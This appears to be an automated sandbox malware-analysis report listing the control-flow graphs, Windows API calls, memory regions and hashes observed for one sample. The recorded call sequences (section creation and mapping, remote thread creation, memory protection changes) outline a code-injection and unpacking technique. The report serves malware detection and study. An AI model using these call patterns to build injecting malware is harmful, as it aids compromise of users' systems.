                                                                                                                              control_flow_graph 366 402f97-402fbb 367 402fc1-402fd9 366->367 368 4030ee-4030f3 366->368 367->368 369 402fdf-402ff0 367->369 370 402ff2-402ffb 369->370 371 403000-40300e 370->371 371->371 372 403010-403017 371->372 373 403039-403040 372->373 374 403019-403038 372->374 375 403062-403065 373->375 376 403042-403061 373->376 374->373 377 403067-40306a 375->377 378 40306e 375->378 376->375 377->378 379 40306c 377->379 378->370 380 403070-403075 378->380 379->380 380->368 381 403077-40307a 380->381 381->368 382 40307c-4030eb RtlCreateUserThread NtTerminateProcess 381->382 382->368
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateProcessTerminateThreadUser
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1921587553-0
                                                                                                                              • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                              • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                                                                              • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                              • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 383 9117d6-9117ef 384 9117f1-9117f3 383->384 385 9117f5 384->385 386 9117fa-911806 CreateToolhelp32Snapshot 384->386 385->386 387 911816-911823 Module32First 386->387 388 911808-91180e 386->388 389 911825-911826 call 911495 387->389 390 91182c-911834 387->390 388->387 393 911810-911814 388->393 394 91182b 389->394 393->384 393->387 394->390
                                                                                                                              APIs
                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 009117FE
                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 0091181E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780720142.000000000090E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0090E000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_90e000_v173TV3V11.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3833638111-0
                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                              • Instruction ID: af866eab8ed17e9b7a48362f477ead9566050c0074fda3856c31d2826a3d5226
                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                              • Instruction Fuzzy Hash: AEF0C2322003197FE7203BF5A88CBAB76ECAF49724F204568E743910C0DBB0E8858A60

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 63 6b003c-6b0047 64 6b0049 63->64 65 6b004c-6b0263 call 6b0a3f call 6b0e0f call 6b0d90 VirtualAlloc 63->65 64->65 80 6b028b-6b0292 65->80 81 6b0265-6b0289 call 6b0a69 65->81 83 6b02a1-6b02b0 80->83 85 6b02ce-6b03c2 VirtualProtect call 6b0cce call 6b0ce7 81->85 83->85 86 6b02b2-6b02cc 83->86 92 6b03d1-6b03e0 85->92 86->83 93 6b0439-6b04b8 VirtualFree 92->93 94 6b03e2-6b0437 call 6b0ce7 92->94 96 6b04be-6b04cd 93->96 97 6b05f4-6b05fe 93->97 94->92 99 6b04d3-6b04dd 96->99 100 6b077f-6b0789 97->100 101 6b0604-6b060d 97->101 99->97 103 6b04e3-6b0505 99->103 104 6b078b-6b07a3 100->104 105 6b07a6-6b07b0 100->105 101->100 106 6b0613-6b0637 101->106 115 6b0517-6b0520 103->115 116 6b0507-6b0515 103->116 104->105 107 6b086e-6b08be LoadLibraryA 105->107 108 6b07b6-6b07cb 105->108 109 6b063e-6b0648 106->109 114 6b08c7-6b08f9 107->114 112 6b07d2-6b07d5 108->112 109->100 110 6b064e-6b065a 109->110 110->100 113 6b0660-6b066a 110->113 117 6b07d7-6b07e0 112->117 118 6b0824-6b0833 112->118 121 6b067a-6b0689 113->121 123 6b08fb-6b0901 114->123 124 6b0902-6b091d 114->124 125 6b0526-6b0547 115->125 116->125 119 6b07e2 117->119 120 6b07e4-6b0822 117->120 122 6b0839-6b083c 118->122 119->118 120->112 127 6b068f-6b06b2 121->127 128 6b0750-6b077a 121->128 122->107 129 6b083e-6b0847 122->129 123->124 126 6b054d-6b0550 125->126 130 6b05e0-6b05ef 126->130 131 6b0556-6b056b 126->131 132 6b06ef-6b06fc 127->132 133 6b06b4-6b06ed 127->133 128->109 134 6b084b-6b086c 129->134 135 6b0849 129->135 130->99 137 6b056f-6b057a 131->137 138 6b056d 131->138 139 6b074b 132->139 140 6b06fe-6b0748 132->140 133->132 134->122 135->107 141 6b059b-6b05bb 137->141 142 6b057c-6b0599 137->142 138->130 139->121 140->139 147 6b05bd-6b05db 141->147 142->147 147->126
                                                                                                                              APIs
                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006B024D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780503587.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6b0000_v173TV3V11.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID: cess$kernel32.dll
                                                                                                                              • API String ID: 4275171209-1230238691
                                                                                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                              • Instruction ID: 1cbfe1bad8ad953d37be5dc3ae992457c84081cda89f7c9b413a08e1e8265b97
                                                                                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                              • Instruction Fuzzy Hash: 275279B5A00229DFDB64CF58C984BA9BBB1BF09304F1480E9E50DAB351DB30AE85DF14

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 365 419cc0-419e00 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(00515FF0), ref: 00419D9F
                                                                                                                              • GetProcAddress.KERNEL32(00000000,00420518), ref: 00419DDC
                                                                                                                              • VirtualProtect.KERNELBASE(00515E34,00515FEC,00000040,?), ref: 00419DFB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780259821.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_40b000_v173TV3V11.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2099061454-3916222277
                                                                                                                              • Opcode ID: 491ec6e3e3ee18dcc8e26f8905b2a401390c51c225c0d3e182c0eb7754f552da
                                                                                                                              • Instruction ID: 9b101dc19ab9e509907a73f40bd9e615ad2773d8f65bdac5e4741cefec9585ad
                                                                                                                              • Opcode Fuzzy Hash: 491ec6e3e3ee18dcc8e26f8905b2a401390c51c225c0d3e182c0eb7754f552da
                                                                                                                              • Instruction Fuzzy Hash: 273164516187C4EAE311CB64FC087523AA2AF79704F448069A148877B3E7BE065ADB6E

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 396 6b0e0f-6b0e24 SetErrorMode * 2 397 6b0e2b-6b0e2c 396->397 398 6b0e26 396->398 398->397
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNELBASE(00000400,?,?,006B0223,?,?), ref: 006B0E19
                                                                                                                              • SetErrorMode.KERNELBASE(00000000,?,?,006B0223,?,?), ref: 006B0E1E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780503587.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6b0000_v173TV3V11.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2340568224-0
                                                                                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                              • Instruction ID: 5ec0122905795958cf8b6ea84eb92189ad46b0a0d2fb6fa6a8bc84ef3f06bca4
                                                                                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                              • Instruction Fuzzy Hash: 19D0123114512877D7002A94DC09BCE7F1CDF05B62F008411FB0DD9180C770994147E5

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 399 4018e6-40194b call 401193 Sleep call 40141f 413 40195a-4019a5 call 401193 399->413 414 40194d-401955 call 401514 399->414 414->413
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1885482327-0
                                                                                                                              • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                                              • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                                                                              • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                                              • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 428 401915-401918 429 4018c6-4018c7 428->429 430 40191a-40194b call 401193 Sleep call 40141f 428->430 431 4018d7 429->431 432 4018ce-4018e3 call 401193 429->432 442 40195a-4019a5 call 401193 430->442 443 40194d-401955 call 401514 430->443 431->432 443->442
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1885482327-0
                                                                                                                              • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                                              • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                                                                              • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                                              • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 457 4018f1-40194b call 401193 Sleep call 40141f 467 40195a-4019a5 call 401193 457->467 468 40194d-401955 call 401514 457->468 468->467
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1885482327-0
                                                                                                                              • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                                              • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                                                                              • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                                              • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 482 401912-40194b call 401193 Sleep call 40141f 493 40195a-4019a5 call 401193 482->493 494 40194d-401955 call 401514 482->494 494->493
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1885482327-0
                                                                                                                              • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                                              • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                                                                              • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                                              • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                                                                                              APIs
                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 009114E6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780720142.000000000090E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0090E000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_90e000_v173TV3V11.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4275171209-0
                                                                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                              • Instruction ID: 889d807f5d3c5eeca9acaf09e5522def054425f0132dadd7a19ce2871e886e99
                                                                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                              • Instruction Fuzzy Hash: 69113C79A00208FFDB01DF98C985E98BBF5AF48351F058094FA499B362D371EA90DF80
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1885482327-0
                                                                                                                              • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                                              • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                                                                              • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                                              • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                                                                                                              APIs
                                                                                                                              • LocalAlloc.KERNELBASE(00000000,00515FEC,0041A29B), ref: 00419C98
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780259821.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_40b000_v173TV3V11.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocLocal
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3494564517-0
                                                                                                                              • Opcode ID: 9ec18e11195fab8466a21664cf9d2760616124b952149bfa647060a6f0581e67
                                                                                                                              • Instruction ID: cdbbb9e7b83af8b631a1fc3647d71b0b27ee278e0583f88c42ef53277000976a
                                                                                                                              • Opcode Fuzzy Hash: 9ec18e11195fab8466a21664cf9d2760616124b952149bfa647060a6f0581e67
                                                                                                                              • Instruction Fuzzy Hash: 26B092B8502600DBD2408B60EC48F953A68E398202F009260FA0085160E7700805AA10
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780503587.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6b0000_v173TV3V11.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .$GetProcAddress.$l
                                                                                                                              • API String ID: 0-2784972518
                                                                                                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                              • Instruction ID: 254654e92616fbed97a9e78bff470e723ef2f09cb09b4f77d6b80293d0aaa023
                                                                                                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                              • Instruction Fuzzy Hash: 29316CB6900609DFEB10CF99C880AEEBBF6FF48324F24514AD441A7351D771EA85CBA4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: s
                                                                                                                              • API String ID: 0-453955339
                                                                                                                              • Opcode ID: beaff77d49ba7ed39faf10c1c123569f036d3b6fb97e5df7d198b0b7b56d3ff2
                                                                                                                              • Instruction ID: 8add8f8bd86fc176e70a0f92649c5ff525822e9121137b16056d3b79f0f57cf6
                                                                                                                              • Opcode Fuzzy Hash: beaff77d49ba7ed39faf10c1c123569f036d3b6fb97e5df7d198b0b7b56d3ff2
                                                                                                                              • Instruction Fuzzy Hash: F221542254C6C05FD7134B380CA8DDA7FB6AD8365A70E41EFC0C0AB4A7C635890B8359
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780720142.000000000090E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0090E000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_90e000_v173TV3V11.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                              • Instruction ID: 074e46546e553bab7f225883b74a488f47149d7046245df60095b0cafcd743a2
                                                                                                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                              • Instruction Fuzzy Hash: F2117072740104AFD744DE55DC81FE6B3EAEB89360B298069EE04CB316D675E881C760
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                                                                                                              • Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
                                                                                                                              • Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                                                                                                              • Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                                                                                                              • Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
                                                                                                                              • Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                                                                                                              • Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780503587.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6b0000_v173TV3V11.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                              • Instruction ID: 234ba53533d4c3da5cb596b1fc6310159d7d1ff50711d85f8090656b9c3ca7e8
                                                                                                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                              • Instruction Fuzzy Hash: 0D01A7B66006048FEF21CF64C805BEB37E6FF85315F4545E5D50697381E774A9818B90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                                                                                                              • Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
                                                                                                                              • Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                                                                                                              • Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                                                                                                              • Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
                                                                                                                              • Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                                                                                                              • Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                                                                                                              • Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
                                                                                                                              • Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                                                                                                              • Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                                                                                                              • Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
                                                                                                                              • Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
